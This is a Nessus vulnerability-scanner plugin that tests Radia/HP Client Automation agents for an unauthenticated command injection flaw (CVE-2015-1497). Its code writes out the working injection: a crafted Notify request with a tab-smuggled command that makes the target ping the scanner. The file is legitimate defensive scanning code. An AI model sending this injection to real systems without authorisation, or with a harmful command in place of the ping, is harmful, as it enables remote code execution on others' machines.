
Persistent Systems Radia Client Automation Agent Command Injection

This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.

The Persistent Systems Radia Client Automation (formerly HP Client Automation) agent listening on the remote port is affected by a command execution vulnerability due to a flaw in the radexecd.exe component. An unauthenticated, remote attacker can exploit this to execute arbitrary commands in the context of the radexecd process.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Plugin registration: identifiers, advisory references, CVSS scoring,
# exploit-availability flags and the plugins this active check depends on.
if (description)
{
  script_id(86427);
  script_version("1.9");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2015-1497");
  script_bugtraq_id(72612);
  script_xref(name:"EDB-ID", value:"36169");
  script_xref(name:"EDB-ID", value:"36206");

  script_name(english:"Persistent Systems Radia Client Automation Agent Command Injection");

  script_set_attribute(attribute:"synopsis", value:
"The Persistent Systems Radia Client Automation agent listening on the
remote port is affected by a command injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The Persistent Systems Radia Client Automation (formerly HP Client
Automation) agent listening on the remote port is affected by a
command execution vulnerability due to a flaw in the radexecd.exe
component. An unauthenticated, remote attacker can exploit this to
execute arbitrary commands in the context of the radexecd process.");
  # Vendor (Accelerite) advisory; the long URL above is referenced through
  # the nessus.org short link below.
  # https://support.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?56b928e5");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-15-038/");
  script_set_attribute(attribute:"solution", value:
"See the vendor advisory for a possible solution.");
  # Network-reachable, low complexity, no authentication, full C/I/A impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  # Public exploit code exists (EDB, Metasploit); this plugin itself
  # performs an active check rather than a version comparison.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'HP Client Automation Command Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/10/19");

  # Both the current (Persistent Systems) and legacy (HP) product CPEs
  # are registered, since the same agent shipped under both names.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:persistent_systems:radia_client_automation");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:client_automation_enterprise");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the check sends a request that makes the target execute
  # a command, so it is classed as an attack rather than info gathering.
  script_category(ACT_ATTACK);
  script_family(english:"General");

  script_copyright(english:"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.");

  # Requires the radexecd service detection (which also records whether
  # authentication is disabled) and the OS fingerprint used to pick the
  # command syntax; not run when the scan is restricted to supplied logins.
  script_dependencies("ovcm_notify_daemon_detect.nasl", "os_fingerprint.nasl");
  script_require_keys("Services/radexecd");
  script_exclude_keys("global_settings/supplied_logins_only");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("dump.inc");

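if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);

# The port for the Notify daemon (radexecd); get_service() exits on our
# behalf when no such service was detected.
port = get_service(svc:'radexecd', default:3465, exit_on_fail:TRUE);

# Attack only if the detection plugin (ovcm_notify_daemon_detect.nasl)
# recorded that radexecd accepts requests without user authentication.
if (get_kb_item("radexecd/" + port + "/noauth") != TRUE)
  exit(0, "User authentication for radexecd on port " + port + " seems to be enabled, skipping the attack.");

# Choose the probe command for the fingerprinted OS. Both variants only
# ping back to the scanning host. The injected command may fail if it is
# not available on the target host, but a vulnerable server will still
# return '\x00' in response, so the verdict does not depend on it running.
# NOTE(review): the extra double quotes around the tab in the Windows
# variant are kept as-is; their role in radexecd's parsing is not
# documented here.
os = get_kb_item("Host/OS");
if (os && "windows" >< tolower(os))
{
  injected = 'cmd.exe /c ping ' + compat::this_host();
  cmd = 'hide hide"\t"' + injected;
}
else
{
  injected = 'sh -c "ping -c 3 ' + compat::this_host() + '"';
  cmd = 'hide hide\t' + injected;
}

s = open_sock_tcp(port);
if (!s) audit(AUDIT_SOCK_FAIL, port);

# Notify request layout: one byte of return port (insignificant here),
# then NUL-terminated user, password and command fields.
req = '\x00' +
      'USER_' + SCRIPT_NAME + '\x00' +
      'PASS_' + SCRIPT_NAME + '\x00' +
      cmd + '\x00';

send(socket:s, data:req);
res = recv(socket:s, length:1024);
close(s);

# No data at all (NULL or empty) means the daemon did not answer the
# request; report that rather than mislabelling it "probably not affected".
if (isnull(res) || strlen(res) == 0)
  audit(AUDIT_RESP_NOT, port, "a Notify request");

# A lone NUL byte is the acknowledgement a vulnerable server returns;
# anything else is dumped for the reader and treated as not affected.
if (res == '\x00')
  security_hole(port:port);
else
  exit(0, "The service listening on port " + port + ' returned the following response, and is probably not affected.\n' + hexdump(ddata:res));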
   
Vendor | Product | Version | CPE
persistent_systems | radia_client_automation | (any) | cpe:/a:persistent_systems:radia_client_automation
hp | client_automation_enterprise | (any) | cpe:/a:hp:client_automation_enterprise